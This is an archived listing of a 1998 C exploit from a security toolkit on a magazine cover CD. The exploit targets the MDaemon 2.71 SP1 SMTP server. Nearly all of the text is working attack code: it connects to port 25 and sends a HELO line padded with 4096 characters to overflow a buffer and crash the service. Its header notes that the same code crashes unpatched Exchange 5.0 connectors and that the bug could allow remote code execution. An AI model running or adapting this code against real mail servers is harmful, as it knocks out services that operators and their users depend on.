Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / mdaemon / heloexpl.c.1 < prev next >

Wrap

Text File | 2005-02-12 | 2KB | 69 lines

/* * MDaemon SMTP server for Windows buffer overflow exploit * * http://www.mdaemon.com - if you dare... * * Tested on MDaemon 2.71 SP1 * * http://www.rootshell.com/ * * Released 3/10/98 * * (C) 1998 Rootshell All Rights Reserved * * For educational use only. Distribute freely. * * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail * connector if SP2 has NOT been installed. * * Danger! * * A malicous user could use this bug to execute arbitrary code on the * remote system. * */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <stdlib.h> #include <unistd.h> void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; char *buffer; int sock, i; if (argc != 2) { printf("usage: %s <smtp server>\n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Unknown host: %s\n",argv[1]); exit(1); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); buffer = (char *)malloc(10000); sprintf(buffer, "HELO "); for (i = 0; i<4096; i++) strcat(buffer, "x"); strcat(buffer, "\r\n"); write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); }